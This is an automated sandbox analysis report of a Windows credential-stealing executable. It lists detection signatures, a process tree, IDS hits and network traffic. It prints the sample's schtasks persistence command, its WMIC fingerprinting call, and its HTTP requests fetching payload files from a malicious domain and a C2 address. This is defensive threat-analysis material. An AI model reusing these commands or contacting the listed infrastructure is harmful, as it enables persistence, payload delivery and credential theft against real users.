Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Mu7iyblZk8.exe

Overview

General Information

Sample name:Mu7iyblZk8.exe
renamed because original name is a hash value
Original sample name:efdac8eafdf875de010fe0a6980aad44b547c2a74430c185a28d67e98168c4b3.exe
Analysis ID:1483418
MD5:74f11a170c0a518ce076ae43f70a7c06
SHA1:86cafa195ca0905f79a4e877c13ad0c7ced257e5
SHA256:efdac8eafdf875de010fe0a6980aad44b547c2a74430c185a28d67e98168c4b3
Tags:exeinvestdirectinsurance-com
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Sigma detected: Silenttrinity Stager Msbuild Activity
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Mu7iyblZk8.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\Mu7iyblZk8.exe" MD5: 74F11A170C0A518CE076AE43F70A7C06)
    • MSBuild.exe (PID: 7732 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 8012 cmdline: "wmic" csproduct get UUID MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7772 cmdline: "cmd.exe" /c schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7840 cmdline: schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • WareHouse.exe (PID: 8060 cmdline: C:\Users\user\AppData\Roaming\WareHouse.exe MD5: 74F11A170C0A518CE076AE43F70A7C06)
    • MSBuild.exe (PID: 1272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 3636 cmdline: "wmic" csproduct get UUID MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3813836224.0000000000423000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Mu7iyblZk8.exe PID: 7560JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Mu7iyblZk8.exe.12c89ac0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Silenttrinity Stager Msbuild Activity
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DesusertionIp: 34.117.59.81, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7732, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49708
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f, CommandLine: schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "cmd.exe" /c schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7772, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f, ProcessId: 7840, ProcessName: schtasks.exe

                  Snort Signatures

                  No Snort rule has matched

                  Suricata Signatures

                  Timestamp:2024-07-27T11:37:19.604629+0200
                  SID:2803270
                  Source Port:49710
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T11:37:15.181306+0200
                  SID:2803270
                  Source Port:49707
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T11:37:20.758950+0200
                  SID:2803270
                  Source Port:49711
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T11:37:14.109499+0200
                  SID:2803270
                  Source Port:49706
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T11:37:31.016993+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49714
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T11:38:08.651121+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49716
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeReversingLabs: Detection: 36%
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeVirustotal: Detection: 24%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: Mu7iyblZk8.exeVirustotal: Detection: 24%Perma Link
                  Source: Mu7iyblZk8.exeReversingLabs: Detection: 36%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: unknownHTTPS traffic detected: 104.21.65.79:443 -> 192.168.2.9:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49708 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.65.79:443 -> 192.168.2.9:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49704 version: TLS 1.2
                  Source: Mu7iyblZk8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\User\Desktop\Outputs\Omboxaav.pdb source: Mu7iyblZk8.exe, WareHouse.exe.0.dr
                  Source: Binary string: C:\Users\User\Desktop\Outputs\Omboxaav.pdbP source: Mu7iyblZk8.exe, WareHouse.exe.0.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0261A85Ch3_2_0261A650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0261A86Fh3_2_0261A650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 04E67D24h3_2_04E67988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h3_2_04E6AA60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_04E62984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_04E62990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, dword ptr [ebp-000000C4h]3_2_04E69902
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]3_2_05B8F7E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then inc dword ptr [ebp-1Ch]3_2_05B80040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0128CD4Ch11_2_0128CB40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0128CD5Fh11_2_0128CB40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 05E104F2h11_2_05E10440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 05E104F2h11_2_05E10448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [ebp-28h]11_2_05E1DA67
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]11_2_06655519
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h11_2_0665B5B1
                  Source: global trafficTCP traffic: 192.168.2.9:49709 -> 45.94.31.188:1237
                  Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                  Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                  Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownDNS query: name: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Miox.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Miox.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                  Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeCode function: 0_2_00007FF886E1166F InternetReadFile,0_2_00007FF886E1166F
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Miox.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Miox.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: investdirectinsurance.com
                  Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                  Source: MSBuild.exe, 00000003.00000002.3816380121.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: WareHouse.exe.0.drString found in binary or memory: https://collection.hubanalytics.io/
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3813836224.0000000000429000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                  Source: WareHouse.exe, 0000000A.00000002.1466432583.000000001BBCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/
                  Source: WareHouse.exe, 0000000A.00000002.1466432583.000000001BBB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/7f)
                  Source: WareHouse.exe, 0000000A.00000002.1464504535.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, WareHouse.exe, 0000000A.00000002.1465533364.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, Mu7iyblZk8.exe, WareHouse.exe.0.drString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Miox.bd
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1410420003.000000001BC61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Miox.bdY
                  Source: Mu7iyblZk8.exe, WareHouse.exe.0.drString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404302143.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd~
                  Source: WareHouse.exe, 0000000A.00000002.1466432583.000000001BBB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/sf
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.3816380121.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3813836224.0000000000429000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json
                  Source: MSBuild.exe, 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/missingauth
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownHTTPS traffic detected: 104.21.65.79:443 -> 192.168.2.9:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49708 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.65.79:443 -> 192.168.2.9:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49704 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
